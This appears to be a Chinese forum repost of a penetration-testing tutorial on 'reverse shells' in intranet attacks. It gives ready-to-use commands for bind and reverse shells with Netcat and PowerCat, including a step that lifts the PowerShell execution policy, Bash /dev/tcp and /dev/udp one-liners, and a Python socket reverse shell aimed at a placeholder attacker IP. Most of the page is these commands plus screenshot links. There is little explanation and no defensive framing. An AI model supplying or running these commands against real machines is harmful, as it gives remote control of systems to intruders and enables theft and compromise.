守听 发表于 前天 13:00

内网安全:反弹shell

目录
一.Netcat反弹Shell
二.PowerCat反弹Shell
PowerCat和nc正向连接
PowerCat和nc反向连接
PowerCat和PowerCat反向连接
三.Bash反弹shell
四.Python 反弹Shell


一.Netcat反弹Shell

在Windows容易被杀
介绍:
   Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作,常用参数如下
    注意:这里需要关闭靶机的防火墙,做NC反弹的时候,前提你也经控制了对方电脑
正向反弹:
   场景:攻击机器和靶机都是在公网上,都能互ping,这个时候可以用正向反弾
利用:
1.在靶机上运行:
   nc -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器
nc -lvvp 1111 -e /bin/bash linux机器
这里以Linux作演示
https://i-blog.csdnimg.cn/direct/1e17ec50c989430985515132017be1e7.png
2在攻击机上运行:
   nc -v 靶机IP 1111
https://i-blog.csdnimg.cn/direct/a7c858bd6d134af5aaea6632487c44df.png
3.拿到shell
反向反弹:
实行前提:
   攻击机器在公网上,靶机在内网里面,这时候需要靶机反向链接攻击机器,也就是反向反弹
利用:
1在攻击者机器运行:
   nc -lvvp 1111 监听1111端口
https://i-blog.csdnimg.cn/direct/ab679246d9cf4455b8b5163cf11f057f.png
2.在靶机上运行 (反弹到公网)
   nc -e C:\Windows\System32\cmd.exe 攻击IP 1111 windos机器
nc -e /bin/bash 攻击IP 1111 linux机器
这里用Linux作演示
https://i-blog.csdnimg.cn/direct/a597bf014f784d9eb57650beb913248a.png
3.拿到反向的shell
https://i-blog.csdnimg.cn/direct/6e1e063572b542f198f3900a0dc3825d.png

二.PowerCat反弹Shell

和NC作用一样,只能用于Windows
   介绍:可以无文件落地
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,天生payload,端口扫描等等。
利用:
1.导入模块:
   Import-Module .\powercat.ps1
https://i-blog.csdnimg.cn/direct/f4bce15136954f0e8cfd39648e62360d.png
假如提示未能加载指定模块,则可能是权限问题,输入如下代码
   Set-ExecutionPolicy Unrestricted

PowerCat和nc正向连接

1、靶机利用powercat执行以下命令:
   powercat -l -p 8080 -e cmd.exe -v
https://i-blog.csdnimg.cn/direct/7d682f94e67d4abeb1f8fc3e331b8028.png
2、攻击机利用nc执行以下命令:
   nc -v 靶机IP 8080 -vv
https://i-blog.csdnimg.cn/direct/abaa37bd39074d4bb6f98ba8a2bc7b36.png
3.乐成反弹

PowerCat和nc反向连接

1、靶机利用powercat执行以下命令
   powercat -c 攻击机IP -p 8888 -v -e cmd.exe
https://i-blog.csdnimg.cn/direct/1c17c77f9009405a8816d6c8d6d3e594.png
2、攻击机利用nc执行以下命令:
   nc -l -p 8888 -vv
https://i-blog.csdnimg.cn/direct/31a2ab01c9304e698501b172e35c99cd.png
3.乐成反弹
https://i-blog.csdnimg.cn/direct/6836dc74607a4a4d9293eb807173df8f.png

PowerCat和PowerCat反向连接

1、靶机利用powercat执行以下命令:
   powercat -c 攻击机器IP -p 9999 -v -ep
https://i-blog.csdnimg.cn/direct/5b54bbd9eb4745e08c3e04edc37c070d.png
2、攻击机利用powercat执行以下命令:
   powercat -l -p 9999 -v
https://i-blog.csdnimg.cn/direct/7ded2f1de2a644a6b5045dace8978978.png
3.乐成反弹
https://i-blog.csdnimg.cn/direct/ddb192c2760a4f8eb9f60e8933691224.png

三.Bash反弹shell

   介绍:传输层的隧道
** Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认利用的Shell**
    ** Bash 反弹Shell的命令如下:**
bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1
bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&2
bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1
bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2
利用:
1、攻击机器利用nc执行监服从令**
   nc -lvvp 9999 监听 TCP
https://i-blog.csdnimg.cn/direct/9ac3d4e9f640450683b9b217f4544fbc.png
   nc -lup 9999 监听UDP (UDP不稳定)
2、实行靶机执行连接命令
   bash -i >&/dev/tcp/攻击机器IP/9999 0>&1
https://i-blog.csdnimg.cn/direct/69c2d5c5ec694390b760c00d29800756.png
3.乐成反弹
https://i-blog.csdnimg.cn/direct/77085de45b554a1c83ec4d8f9116f778.png

四.Python 反弹Shell

利用:
1、攻击机器利用nc执行监服从令
   nc -lvvp 1111 监听 TCP
https://i-blog.csdnimg.cn/direct/b57b71a97e4e49be8537d3908bfba006.png
2、实行靶机执行连接命令
   python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机器IP",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
https://i-blog.csdnimg.cn/direct/a3bb40c4776b4c4293aae92d938d78c0.png
3.乐成反弹
https://i-blog.csdnimg.cn/direct/629715582f754ce0a4701f10b2d9eca5.png





免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: 内网安全:反弹shell